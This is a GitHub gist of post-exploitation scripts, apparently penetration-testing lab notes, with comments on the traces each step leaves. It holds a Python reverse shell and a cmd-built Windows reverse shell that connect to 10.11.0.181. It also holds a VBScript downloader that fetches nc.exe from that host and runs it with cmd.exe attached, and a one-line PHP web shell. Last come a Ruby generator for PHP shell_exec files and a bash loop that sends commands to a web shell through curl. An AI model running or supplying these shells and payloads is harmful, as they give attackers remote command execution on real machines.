@rkachowski
Last active January 31, 2017 00:29
stupid lfi scripts
REM Inventory line: checks which interpreters and download helpers are on PATH.
REM where prints the full path of every name that resolves; names that are not
REM installed print an error instead. This is interactive cmd syntax - in a .bat
REM file the loop variable has to be written with a doubled percent sign.
for %i in (ruby python ftp debug wscript cscript powershell javac) do where %i
# Python one-liner reverse shell: opens a TCP connection to 10.11.0.181:4443,
# duplicates the socket onto fds 0/1/2 and runs /bin/sh -i on top of it.
# Host-side artifact: a python process holding an outbound connection to
# port 4443 with an interactive /bin/sh child.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.181",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
REM Builds prs.py one echo line at a time (the first line uses a single redirect
REM and creates the file, every later line appends) and then runs it with python.
REM The generated script connects to 10.11.0.181:4441, starts cmd.exe with piped
REM stdin and stdout, and runs two daemon threads - s2p copies socket data into
REM the process stdin, p2s copies process stdout back to the socket one byte at
REM a time. p.wait() blocks until cmd.exe exits; Ctrl-C closes the socket.
REM The caret on the len(data) line escapes the greater-than sign so cmd does not
REM treat it as a redirect. The echo. lines emit empty lines into the file.
echo import os,socket,subprocess,threading; > prs.py
echo def s2p(s, p): >> prs.py
echo while True: >> prs.py
echo data = s.recv(1024) >> prs.py
echo if len(data) ^> 0: >> prs.py
echo p.stdin.write(data) >> prs.py
echo. >> prs.py
echo def p2s(s, p): >> prs.py
echo while True: >> prs.py
echo s.send(p.stdout.read(1)) >> prs.py
echo. >> prs.py
echo s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) >> prs.py
echo s.connect(("10.11.0.181",4441)) >> prs.py
echo. >> prs.py
echo p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) >> prs.py
echo. >> prs.py
echo s2p_thread = threading.Thread(target=s2p, args=[s, p]) >> prs.py
echo s2p_thread.daemon = True >> prs.py
echo s2p_thread.start() >> prs.py
echo. >> prs.py
echo p2s_thread = threading.Thread(target=p2s, args=[s, p]) >> prs.py
echo p2s_thread.daemon = True >> prs.py
echo p2s_thread.start() >> prs.py
echo. >> prs.py
echo try: >> prs.py
echo p.wait() >> prs.py
echo except KeyboardInterrupt: >> prs.py
echo s.close() >> prs.py
REM Host-side artifacts: prs.py on disk plus a python.exe process with an
REM outbound connection to port 4441 and a cmd.exe child.
python prs.py
REM Writes wget.vbs, a small WinHTTP downloader: argument 0 is the URL, argument 1
REM the output path. It creates WinHttp.WinHttpRequest.5.1 (with older WinHttp and
REM MSXML objects listed as fallbacks), issues a synchronous GET, takes ResponseBody
REM as a byte array and writes it byte by byte through FileSystemObject.
REM The Const lines are declared but never used. strUrl and strURL are the same
REM variable because VBScript identifiers are case-insensitive.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
REM Fetches nc.exe from 10.11.0.181:8000 with the script above, then runs it with a
REM connect-back to port 4443 and cmd.exe attached. Artifacts on the host: wget.vbs
REM and nc.exe on disk, a wscript/cscript process doing an outbound HTTP GET, and an
REM nc.exe process holding an outbound connection with a cmd.exe child.
wget.vbs http://10.11.0.181:8000/nc.exe nc.exe
nc.exe -n 10.11.0.181 4443 -e cmd.exe
REM Writes ws.php, a one-line PHP web shell: when a cmd request parameter is present
REM it is passed straight to system() and the output is printed inside pre tags.
REM The carets escape the angle brackets of the PHP tags so cmd does not treat them
REM as redirects. On a web host this is the file to hunt for - any .php whose body
REM hands a request variable to system(), shell_exec() or similar.
echo ^<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?^> > ws.php
REM Duplicate of the wget.vbs writer above - the same 25 echo lines, kept as pasted.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
#!/usr/bin/env ruby
# Entry point: reads a list of commands (one per line) from ARGV[0] and writes
# a PHP file to ARGV[1] that runs each of them through shell_exec (see template).
# Prints a usage line and exits 1 when either argument is missing or the source
# file does not exist.
def run
source, destination = ARGV
unless source and File.exist?(source) and destination
puts "usage: #{__FILE__} <source> <output>"
exit 1
end
# lines.to_a keeps the trailing newline on every entry; template chomps it.
File.open(destination, 'w') {|f| f << template(File.read(source).lines.to_a)}
end
# Renders the PHP wrapper as a string: every entry of `stuff` becomes one
# single-quoted element of the $to_execute array, and the PHP loop hands each
# element to shell_exec and echoes the result.
# NOTE(review): the triple quote is not a Ruby heredoc. It lexes as an empty
# string, the quoted block, and another empty string, which Ruby concatenates,
# so the result starts and ends with a newline. No comments can go inside it
# without becoming part of the output.
def template stuff
"""
<?php
$to_execute = array(
#{stuff.map{|s| " '" + s.chomp() +"'"}.join(",\n")}
);
foreach( $to_execute as $cmd )
{
echo shell_exec($cmd);
}
?>
"""
end
# Only run when executed directly, not when this file is required elsewhere.
run if __FILE__ == $0
#!/bin/bash
# Path of the file holding one command per line; taken unchecked from $1
# (an empty or missing argument is only noticed when cat fails below).
file=$1
# Name of the query parameter the target page passes to its shell.
shell_eval_command="cmd"
# Base URL; it already ends in '?', so the loop below produces '?&cmd=...'.
exploitable_url="http://10.11.0.0/search_shell.php?"
# thanks stack overflow
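#######################################
# Percent-encode a string for use in a URL query: RFC 3986 unreserved
# characters (A-Z a-z 0-9 - _ . ~) pass through, every other byte becomes
# %XX (lowercase hex).
# Arguments: $1 - the string to encode
# Outputs:   the encoded string on stdout, newline-terminated
# Globals:   REPLY (written) - also receives the encoded string
# Returns:   0
#######################################
rawurlencode() {
  local string="${1}"
  # Iterate bytes, not characters: under a UTF-8 locale ${string:pos:1} yields
  # a whole multibyte character and "'$c" its code point, which %02x would
  # print as one (wrong) escape. In the C locale each byte is encoded on its
  # own and the a-z/A-Z ranges in the case pattern are plain ASCII.
  local LC_ALL=C
  local strlen=${#string}
  local encoded=""
  local pos c o
  for (( pos = 0; pos < strlen; pos++ )); do
    c=${string:pos:1}
    case "$c" in
      [-_.~a-zA-Z0-9]) o="${c}" ;;
      # "'$c" makes printf use the numeric value of the first character
      *) printf -v o '%%%02x' "'$c" ;;
    esac
    encoded+="${o}"
  done
  # printf rather than echo: '-' is unreserved, so an input such as "-n" or
  # "-e" encodes to itself and bash's echo would swallow it as an option.
  printf '%s\n' "${encoded}"
  # Also hand the result back in REPLY so callers can skip the subshell.
  REPLY="${encoded}"
}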
# Sends every line of "$file" as one request to $exploitable_url.
# NOTE(review): $file is unquoted and read is used without -r and IFS= -
# lines containing backslashes or leading/trailing blanks are altered before
# they are encoded, and a path with spaces breaks the cat.
cat $file | while read line; do
# rawurlencode prints the encoded value; the backticks capture it.
encoded_line=`rawurlencode "$line"`
# $exploitable_url already ends in '?', so the URL reads '?&cmd=...'.
url="$exploitable_url&$shell_eval_command=$encoded_line"
echo "cmd : $url"
# -D - dumps the response headers to stdout and head keeps only the status
# line, so the loop shows one HTTP status per command and discards the body.
# On the server side each iteration is one GET in the access log carrying a
# cmd parameter - a burst of such requests from one client is the signature.
curl -s -o /dev/null -D - --get "$url" | head -n 1
done